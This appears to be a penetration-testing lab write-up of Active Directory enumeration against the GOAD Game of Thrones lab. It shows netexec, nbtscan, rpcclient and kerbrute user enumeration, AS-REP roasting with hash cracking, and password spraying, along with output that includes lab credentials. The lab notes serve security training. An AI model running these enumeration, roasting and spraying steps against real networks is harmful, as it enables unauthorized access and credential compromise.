Enumeration
AD Network Enumeration
Network Overview via Netexec SMB
nxc smb 192.168.56.1/24
SMB 192.168.56.1 445 KILLERKATAK [*] Windows 10 / Server 2019 Build 19041 x64 (name:KILLERKATAK) (domain:killerkatak) (signing:False) (SMBv1:False)
SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
3 Domains, hence, 3 DCs (ignore killerkatak)
- essos.local (2 machines)
- MEEREEN (Windows Server 2016) (signing:True)
- BRAAVOS (Windows Server 2016) (signing:False)
- sevenkingdoms.local (1 machine)
- KINGSLANDING (Windows Server 2019) (signing:True)
- north.sevenkingdoms.local (2 machines)
- WINTERFELL (Windows Server 2019) (signing:True)
- CASTELBLACK (Windows Server 2019) (signing:False)
By default, DCs are set up with SMB Signing as True. As such, from here, we can immediately identify the DCs, i.e. MEEREEN, KINGSLANDING & WINTERFELL.
As best practice, SMB Signing should always be set to True to avoid NTLM relay. This also means that this is not a surefire way of telling the DCs apart from their domain members.
Another method: NBTscan
Another method of scanning the subnet for machines.
nbtscan 192.168.56.1/24
Doing NBT name scan for addresses from 192.168.56.1/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.56.23 BRAAVOS <server> <unknown> 00:0c:29:d2:a4:8e
192.168.56.11 WINTERFELL <server> <unknown> 00:0c:29:78:a6:e1
192.168.56.10 KINGSLANDING <server> <unknown> 00:0c:29:41:8c:df
192.168.56.22 CASTELBLACK <server> <unknown> 00:0c:29:70:58:d7
192.168.56.12 MEEREEN <server> <unknown> 00:0c:29:7d:53:da
DNS Query
nslookup
nslookup -type=srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
nslookup: Query DNS servers for information about various types of DNS records (e.g., A, AAAA, MX, SRV).-type=srv: Specify looking for SRV records which define the location of servers for a specific service in the domain, such as LDAP, Kerberos, etc._ldap._tcp.dc._msdcs.sevenkingdoms.local: The specific SRV record to query for. It’s related to the LDAP service (_ldap), using TCP (_tcp), for Domain Controllers (dc), within the MSDCS (Microsoft Domain Controller Services) part of the domainsevenkingdoms.local.192.168.56.10: The IP address of the DNS server to query.
This is to query the server, 192.168.56.10, to retrieve the SRV record for the LDAP service of the Domain Controllers in the sevenkingdoms.local domain. SRV records are used by client machines to locate domain controllers and other services within the domain.
For example, an SRV record for _ldap._tcp.dc._msdcs.sevenkingdoms.local might point to a domain controller such as dc01.sevenkingdoms.local, indicating that LDAP services can be reached on that server. In this case, the specified SRV record is pointing to kingslanding.sevenkingdoms.local.
priority = 0
weight = 100
port = 389
svr hostname = kingslanding.sevenkingdoms.local
host command
The same can be achieved using the host command:
host -t srv _ldap._tcp.dc._msdcs.sevenkingdoms.local 192.168.56.10
Kerberos
Setting Up Kerberos in Linux
sudo apt install krb5-user
When requested during installation:
- realm : essos.local
- servers : meereen.essos.local
The rest can be set up in the /etc/krb5.conf like so:
[libdefaults]
default_realm = essos.local
# The following krb5.conf variables are only for MIT Kerberos.
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
rdns = false
# The following libdefaults parameters are only for Heimdal Kerberos.
fcc-mit-ticketflags = true
[realms]
essos.local = {
kdc = meereen.essos.local
admin_server = meereen.essos.local
}
sevenkingdoms.local = {
kdc = kingslanding.sevenkingdoms.local
admin_server = kingslanding.sevenkingdoms.local
}
north.sevenkingdoms.local = {
kdc = winterfell.north.sevenkingdoms.local
admin_server = winterfell.north.sevenkingdoms.local
}
...
Retrieving Ticket via getTGT.py
Some Notes
The Command
impacket-getTGT essos.local/khal.drogo:horse
impacket-getTGT: Impacket tool to obtain a Ticket Granting Ticket (TGT) from a Kerberos Key Distribution Center (KDC) in a domain environment. A TGT is the first ticket issued when a user authenticates to a Kerberos-based network (such as Active Directory). This ticket is used to request other service tickets within the domain.essos.local/khal.drogo:essos.local: The domain name.khal.drogo: The username of the account for which you’re requesting the TGT.
horse: This is the password for thekhal.drogoaccount in plaintext.
Example of a TGT Request Process:
- Requesting TGT: The client requests a TGT from the KDC by providing the username and password.
- KDC Authentication: The KDC verifies the credentials and issues a TGT, encrypted with the user’s password.
- Accessing Resources: The TGT can then be used to request additional service tickets for accessing specific services within the domain.
Similar Tools
kerberos.pyfrom Impacket: Another tool that can interact with Kerberos tickets.Rubeus: A powerful tool for interacting with Kerberos tickets and performing attacks like Pass-the-Ticket.
Practice
Retrieve the TGT:
Save the TGT to the environment variable KRB5CCNAME for use with impacket-smbclient:
export KRB5CCNAME=/home/hans/Documents/GOAD/khal.drogo.ccache
Connect via smbclient using the TGT:
impacket-smbclient -k @braavos.essos.local
Impacket v0.11.0 - Copyright 2023 Fortra
Type help for list of commands
# shares
ADMIN$
all
C$
CertEnroll
IPC$
public
# use C$
# ls
drw-rw-rw- 0 Thu Feb 14 19:42:31 2019 $Recycle.Bin
-rw-rw-rw- 384322 Fri Feb 15 03:39:06 2019 bootmgr
-rw-rw-rw- 1 Fri Feb 15 03:39:06 2019 BOOTNXT
-rw-rw-rw- 554 Tue Dec 24 06:41:51 2024 dns_log.txt
drw-rw-rw- 0 Tue Dec 24 05:48:35 2024 Documents and Settings
drw-rw-rw- 0 Tue Dec 24 06:57:49 2024 inetpub
-rw-rw-rw- 1610612736 Tue Dec 24 07:30:38 2024 pagefile.sys
drw-rw-rw- 0 Thu Feb 14 20:19:37 2019 PerfLogs
drw-rw-rw- 0 Tue Dec 24 07:19:20 2024 Program Files
drw-rw-rw- 0 Tue Dec 24 07:30:21 2024 Program Files (x86)
drw-rw-rw- 0 Tue Dec 24 07:16:28 2024 ProgramData
drw-rw-rw- 0 Tue Dec 24 05:49:52 2024 Recovery
drw-rw-rw- 0 Tue Dec 24 07:16:53 2024 setup
drw-rw-rw- 0 Tue Dec 24 07:33:53 2024 shares
drw-rw-rw- 0 Fri Feb 15 03:41:23 2019 System Volume Information
drw-rw-rw- 0 Tue Dec 24 05:52:40 2024 tmp
drw-rw-rw- 0 Tue Dec 24 07:20:23 2024 Users
drw-rw-rw- 0 Tue Dec 24 06:59:38 2024 Windows
Once done using the TGT, unset it:
unset KRB5CCNAME
Enumerate Users via Anonymous Connections
Netexec
nxc smb 192.168.56.11 --users
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL -Username- -Last PW Set- -BadPW- -Description-
SMB 192.168.56.11 445 WINTERFELL Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 192.168.56.11 445 WINTERFELL arya.stark 2024-12-23 22:50:12 0 Arya Stark
SMB 192.168.56.11 445 WINTERFELL sansa.stark 2024-12-23 22:50:25 0 Sansa Stark
SMB 192.168.56.11 445 WINTERFELL brandon.stark 2024-12-23 22:50:28 0 Brandon Stark
SMB 192.168.56.11 445 WINTERFELL rickon.stark 2024-12-23 22:50:30 0 Rickon Stark
SMB 192.168.56.11 445 WINTERFELL hodor 2024-12-23 22:50:33 0 Brainless Giant
SMB 192.168.56.11 445 WINTERFELL jon.snow 2024-12-23 22:50:36 0 Jon Snow
SMB 192.168.56.11 445 WINTERFELL samwell.tarly 2024-12-23 22:50:39 0 Samwell Tarly (Password : Heartsbane)
SMB 192.168.56.11 445 WINTERFELL jeor.mormont 2024-12-23 22:50:41 0 Jeor Mormont
SMB 192.168.56.11 445 WINTERFELL sql_svc 2024-12-23 22:50:44 0 sql service
Password Policy
nxc smb 192.168.56.11 --pass-pol
SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 192.168.56.11 445 WINTERFELL [+] Dumping password info for domain: NORTH
SMB 192.168.56.11 445 WINTERFELL Minimum password length: 5
SMB 192.168.56.11 445 WINTERFELL Password history length: 24
SMB 192.168.56.11 445 WINTERFELL Maximum password age: 311 days 2 minutes
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Password Complexity Flags: 000000
SMB 192.168.56.11 445 WINTERFELL Domain Refuse Password Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Store Cleartext: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Lockout Admins: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Clear Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password No Anon Change: 0
SMB 192.168.56.11 445 WINTERFELL Domain Password Complex: 0
SMB 192.168.56.11 445 WINTERFELL
SMB 192.168.56.11 445 WINTERFELL Minimum password age: 1 day 4 minutes
SMB 192.168.56.11 445 WINTERFELL Reset Account Lockout Counter: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Locked Account Duration: 5 minutes
SMB 192.168.56.11 445 WINTERFELL Account Lockout Threshold: 5
SMB 192.168.56.11 445 WINTERFELL Forced Log off Time: Not Set
enum4linux
enum4linux 192.168.56.11
We also get the user list and password policy.
Additionally, we also get the full Domain User list.
Nullinux
Another tool that can be used to enumerate users and domain information.
% nullinux 192.168.56.11
Starting nullinux v5.5.0dev | 12-30-2024 17:31
[*] Enumerating Shares for: 192.168.56.11
Shares Comments
-------------------------------------------
[-] No Shares Detected
[*] Enumerating Domain Information for: 192.168.56.11
[+] Domain Name: NORTH
[+] Domain SID: S-1-5-21-1052593633-76167738-4015273304
[*] Enumerating querydispinfo for: 192.168.56.11
arya.stark
brandon.stark
Guest
hodor
jeor.mormont
jon.snow
rickon.stark
samwell.tarly
sansa.stark
sql_svc
[*] Enumerating enumdomusers for: 192.168.56.11
Guest
arya.stark
sansa.stark
brandon.stark
rickon.stark
hodor
jon.snow
samwell.tarly
jeor.mormont
sql_svc
[*] Enumerating LSA for: 192.168.56.11
[*] Performing RID Cycling for: 192.168.56.11
[*] Testing 192.168.56.11 for Known Users
[*] Enumerating Group Memberships for: 192.168.56.11
[+] Group: Domain Users
Administrator
vagrant
krbtgt
SEVENKINGDOMS$
...<truncated>...
RPC Calls
rpcclient -U "" -N 192.168.56.11
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[arya.stark] rid:[0x456]
user:[sansa.stark] rid:[0x45a]
user:[brandon.stark] rid:[0x45b]
user:[rickon.stark] rid:[0x45c]
user:[hodor] rid:[0x45d]
user:[jon.snow] rid:[0x45e]
user:[samwell.tarly] rid:[0x45f]
user:[jeor.mormont] rid:[0x460]
user:[sql_svc] rid:[0x461]
rpcclient $> enumdomgroups
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[DnsUpdateProxy] rid:[0x44f]
group:[Stark] rid:[0x452]
group:[Night Watch] rid:[0x453]
group:[Mormont] rid:[0x454]
net rpc group members 'domain users' -U '' -N -I 192.168.56.11
NORTH\Administrator
NORTH\vagrant
NORTH\krbtgt
NORTH\SEVENKINGDOMS$
NORTH\arya.stark
NORTH\eddard.stark
NORTH\catelyn.stark
NORTH\robb.stark
NORTH\sansa.stark
NORTH\brandon.stark
NORTH\rickon.stark
NORTH\hodor
NORTH\jon.snow
NORTH\samwell.tarly
NORTH\jeor.mormont
NORTH\sql_svc
Bruteforcing Users
In most cases, DCs do not allow for anonymous sessions. As such, we might need to create our own user list to bruteforce Kerberos in order to enumerate users.
In GOAD, since the users are based on characters in Game of Thrones, GOAD’s author created a user list from the list of characters listed in the website:
curl -s https://www.hbo.com/game-of-thrones/cast-and-crew | grep 'href="/game-of-thrones/cast-and-crew/'| grep -o 'aria-label="[^"]*"' | cut -d '"' -f 2 | awk '{if($2 == "") {print tolower($1)} else {print tolower($1) "." tolower($2);} }' > got_users.txt
At the time of writing, there were duplicates so I had to do sort -u to remove them.
Kerbrute
https://github.com/ropnop/kerbrute
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local got_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/30/24 - Ronnie Flathers @ropnop
2024/12/30 22:45:48 > Using KDC(s):
2024/12/30 22:45:48 > 192.168.56.10:88
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > [+] VALID USERNAME: [email protected]
2024/12/30 22:45:48 > Done! Tested 80 usernames (7 valid) in 0.071 seconds
% kerbrute userenum --dc 192.168.56.12 -d essos.local got_users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/30/24 - Ronnie Flathers @ropnop
2024/12/30 22:46:00 > Using KDC(s):
2024/12/30 22:46:00 > 192.168.56.12:88
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > [+] VALID USERNAME: [email protected]
2024/12/30 22:46:00 > Done! Tested 80 usernames (5 valid) in 0.106 seconds
Nmap
Another method to bruteforce users is using an Nmap NSE script:
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='essos.local',userdb=got_users.txt" 192.168.56.12 -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 22:58 +08
Nmap scan report for essos.local (192.168.56.12)
Host is up (0.0028s latency).
PORT STATE SERVICE
88/tcp open kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
| [email protected]
| [email protected]
| [email protected]
| [email protected]
|_ [email protected]
Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds
List Shares as guest
enum4linux
enum4linux -S -u 'guest' -p '' 192.168.56.22
Nullinux
% nullinux -shares -U 'guest' -P '' 192.168.56.22
Starting nullinux v5.5.0dev | 01-01-2025 13:02
[*] Enumerating Shares for: 192.168.56.22
Shares Comments
-------------------------------------------
\\192.168.56.22\ADMIN$ Remote Admin
\\192.168.56.22\all Basic RW share for all
\\192.168.56.22\C$ Default share
\\192.168.56.22\IPC$
\\192.168.56.22\public Basic Read share for all domain users
[*] Enumerating: \\192.168.56.22\all
. D 0 Wed Jan 1 13:00:59 2025
.. D 0 Wed Jan 1 13:00:59 2025
arya.txt A 413 Tue Dec 24 07:33:36 2024
[*] 0 unique user(s) identified
Netexec
For quick enumeration of shares:
nxc smb 192.168.56.10-23 -u 'guest' -p '' --shares
Users But No Credentials
ASREPRoast
Simple:
impacket-GetNPUsers -no-pass -usersfile nullinux_users.txt north.sevenkingdoms.local/
With file output and hash format for hashcat:
impacket-GetNPUsers -no-pass -usersfile nullinux_users.txt north.sevenkingdoms.local/ -format hashcat -outputfile ASREPhash
Note the trailing / in specifying the domain, north.sevenkingdoms.local.
Hashcat
hashcat -m 18200 asrephash /usr/share/wordlists/rockyou.txt
John
john --wordlist=/usr/share/wordlists/rockyou.txt ASREPhash_john
Password Spray
Check if any of the users are using their usernames as passwords. (e.g. admin:admin, john:john).
Netexec
nxc smb 192.168.56.11 -u nullinux_users.txt -p nullinux_users.txt --no-bruteforce --continue-on-success
Sprayhound
https://github.com/Hackndo/sprayhound
Bruteforce
sprayhound -U nullinux_users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 --lower
Note: Use sparingly as this will increment badpwdcount (see below)
Bruteforce w/ Valid User
This method makes use of a valid user to retrieve the password policy (-lu and -lp). It also stops an attempt on a user if it has 2 attempts left before account lockout (-t 2).
sprayhound -U nullinux_users.txt -d north.sevenkingdoms.local -dc 192.168.56.11 -lu hodor -lp hodor --lower -t 2
